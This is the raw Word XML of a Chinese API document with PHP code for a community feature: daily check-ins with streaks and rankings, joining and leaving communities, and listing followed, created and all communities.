    <w:p w14:paraId="1914B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A750B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471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86B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B5D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punch_in </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户社区签到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A098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当前登录用户社区签到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3BE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37F67E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65A4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029DE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ircle_id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必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71515B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社区签到成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59353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punches     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区连续签到次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ACE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sort        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区签到排名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5ED1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total_sort  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户总榜签到排名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C992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社区签到失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496D98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C8B29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EC6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unch_in()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED2F8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95B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14B9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member_id'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAF9E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B4E7E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D554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签到</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B900E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208EF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3A6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0410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id'] = input('param.circle_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFDC7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEAA8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444CB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E504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849B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326C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729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1B6246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24429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AAEB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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEF57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F71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社区不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C964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0D1A94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AFA4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58B8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member = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BA44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32E64A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7C1C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member)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9BAC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22920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加入社区，然后签到</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC15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198E5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2C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7B7D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member['follow'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359C2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member['update_time']) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DCD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51726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2DB17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BC3C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_in' =&gt; 1, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7162D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1, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787184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time' =&gt; time(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FAD6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134C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 Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46777D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data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710F62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76491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CF431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 Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2211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08F37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FA4F0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5B286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社区签到成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD23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circle_member['punches'] + 1, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BF09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ort' =&gt; $sort,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DC3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gt; $total_sort,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E99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6B1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7B9E4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me() - $circle_member['update_time'] &gt; 3600 * 24 &amp;&amp; time() - $circle_member['update_time'] &lt; 3600 * 48) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C08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7E6A8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570E13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5206A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_in' =&gt; $circle_member['punch_in'] + 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C67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circle_member['punches'] + 1, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5CA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time' =&gt; time(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A45B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D9B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 Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B95A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data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EEE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03DC6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8CBAA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 Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7848E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204EA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3F31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ED6F0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社区签到成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E80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circle_member['punches'] + 1, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E41FE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gt; $sort,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D16F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gt; $total_sort,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B81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5663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ime() - $circle_member['update_time'] &gt; 3600 * 48) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76245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6A82C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36E34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49496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_in' =&gt; $circle_member['punch_in'] + 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21385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0, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0879E0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date_time' =&gt; time(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A9F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BE4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 Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED28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data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA9F0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2885A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B597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 Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21403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36D83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0A87E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AF7B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社区签到成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C82C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0, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10292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gt; $sort,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D9FB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gt; $total_sort,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66980F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A8FF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8502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 Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1732FA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data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE3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308DC3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update_time', '&lt;', $circle_member['update_time'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4998F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D3175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 Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D87D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gt;', strtotime('today'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE4A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pdate_time', '&lt;', $circle_member['update_time'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212DD0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595E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278F3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今日你已签到</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451150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nches' =&gt; $circle_member['punches'], </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443AE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ort' =&gt; $sort,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225C7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_sort' =&gt; $total_sort,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5841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CBF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2BF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B16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ADA02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8ED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加入社区，然后签到</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFFC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2DC6E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9FF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1A48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636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00F1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follow </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户加入｜退出社区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4635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当前登录用户加入｜退出社区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8CB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48AF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13866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BCE1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ircle_id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必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D367D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加入｜退出社区成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E885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标识位：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>退出；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F661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加入社区失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F44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3AC088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500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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2331C8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E23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D6DD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0AF7D9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16D0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DD876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加入社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643624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C1F15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905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DF7A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id'] = input('param.circle_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5C6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B19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E450B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29D05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91C6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79B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968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66BDE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id', $data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E81A6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EE9A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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15828E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member = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA9A6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2354E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0AE59A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member)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2561C6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member['follow'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33051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64EFEC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356B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11878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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168B9E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054750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E8C6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C01A7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7683B2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follower_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356CE3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退出您所创建的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2D5948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circle['member_id'], $content, '', '', $data['circle_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5533F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您已退出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44E7D2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circle['member_id'], $this-&gt;memberId, $content, '', '', $data['circle_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8569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534E9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退出社区成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E4D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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB148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2C43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C374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member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7F72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761C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4CF02C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34E882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56D59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EDAE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B504D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02C35F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follower_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2AA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加入你所创建的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2C5327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circle['member_id'], $content, '', '', $data['circle_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2B6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您已加入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563026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circle['member_id'], $this-&gt;memberId, $content, '', '', $data['circle_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103DD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FA91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加入社区成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C653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24730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C0B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6F34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73AAC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ollow'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F7F3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unch_in'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63342A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unches'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633DA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4F1D50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ircle_member_id = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32981A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10339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member_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A63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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EF1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5D9DD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follower_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C39DD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加入你所创建的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22ED0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circle['member_id'], $content, '', '', $data['circle_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793D4E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您已加入社区【</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $circle['title'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4002A2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circle['member_id'], $this-&gt;memberId, $content, '', '', $data['circle_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401AE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28B4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加入社区成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155EEE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75E7E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49D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0CC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356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CBAC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386D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社区不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1669E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89BB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2242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67D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ACB27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加入社区失败，请稍后重试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC3B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53E09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030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4B7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2A2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followed_list </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取当前用户关注的社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A53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当前用户关注的社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D10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5FE0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E00E7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3BC99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75611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28BC7D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当前用户关注的社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621F9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社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700580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用户社区标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2703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社区描述说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C419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    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区所属分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53140D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已关注社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434AA6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21DADD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64649F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423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ed_list()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E669A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3144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3A10BC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2F187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_ids = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A50A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E8C0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ollowed_circles = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C64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15633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19CE10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circle_id')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115FD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25CC02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circles) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8794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ollowed_circles as $followed_circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5245BF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_ids[] = $followed_circle['circle_id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C159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8DD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9696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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0134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18370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gt; 10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118E66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t_page" =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0B6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12DDF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87B1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s);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BA7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2A3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3B1D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2F0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1B4D3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D344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B24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D752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circle_ids) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A846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15327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n', $followed_circle_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDE5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2AE6A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6E28A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29A9D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340A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AC1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4D3C94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gt; 10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282CB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t_page" =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57456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1CA0AB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EA2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FCC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s['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17985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s['data'] as $key =&gt; $circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B33F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img']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23876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img'] = '/public/style/index/member/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D713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A4D1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img'] = _imgUrl() . $circle['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC3A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73C0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des'] = is_null($circle['des']) ? 0 : $circle['des'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629EFC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hide'] = is_null($circle['hide']) ? 0 : $circle['hide'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083BF3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article_num'] = is_null($circle['article_num']) ? 0 : $circle['article_num'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F05E4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follower_num'] = is_null($circle['follower_num']) ? 0 : </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$circle['follower_num'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20193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type'] = Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0253D8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circle['type_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B7B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54D681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2E0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4787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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C880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87F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s);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C45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74F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990F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my_list </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取当前用户创建的社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D029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当前用户创建的社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BF0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29AE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B733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1D58BE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70A2E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33DEA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当前用户创建的社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005D0D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社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEDBA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用户社区标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172292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社区描述说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245167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    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区所属分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EC19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399E4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8AB3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964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y_list()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40148C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69A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41312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AC96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0B1C1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4FA980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AC1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36ED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3848F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63579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 = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338D1F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47EFD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580C82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72E5B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my_circles['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71705F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my_circles['data'] as $key =&gt; $my_circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1C76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_circle['img']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F0E1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img'] = '/public/style/index/member/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F83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D144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img'] = _imgUrl() . $my_circle['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4D5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3E8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des'] = is_null($my_circle['des']) ? 0 : $my_circle['des'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13233A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hide'] = is_null($my_circle['hide']) ? 0 : $my_circle['hide'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4985F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article_num'] = is_null($my_circle['article_num']) ? 0 : </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$my_circle['article_num'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B72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follower_num'] = is_null($my_circle['follower_num']) ? 0 : $my_circle['follower_num'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72841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key]['type'] = Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFB6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y_circle['type_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8D5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1B59E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CA4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5558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circles['data'] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3FC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C74F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my_circles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F316E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666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64B0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index </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCEF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社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3967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848F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36D69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47834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type_id       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A70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4F86D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035C3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用户社区列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B6C0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社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15109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用户社区标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377CF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社区描述说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA4B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         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区所属分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD9F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rticle_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50671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_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAB18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已关注社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4C781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14BDC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F4EF6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63AE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4233C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8A7F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544C43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0CCA3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param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45873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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAF47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5556C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type_id)</w:t>
      </w:r>
    </w:p>
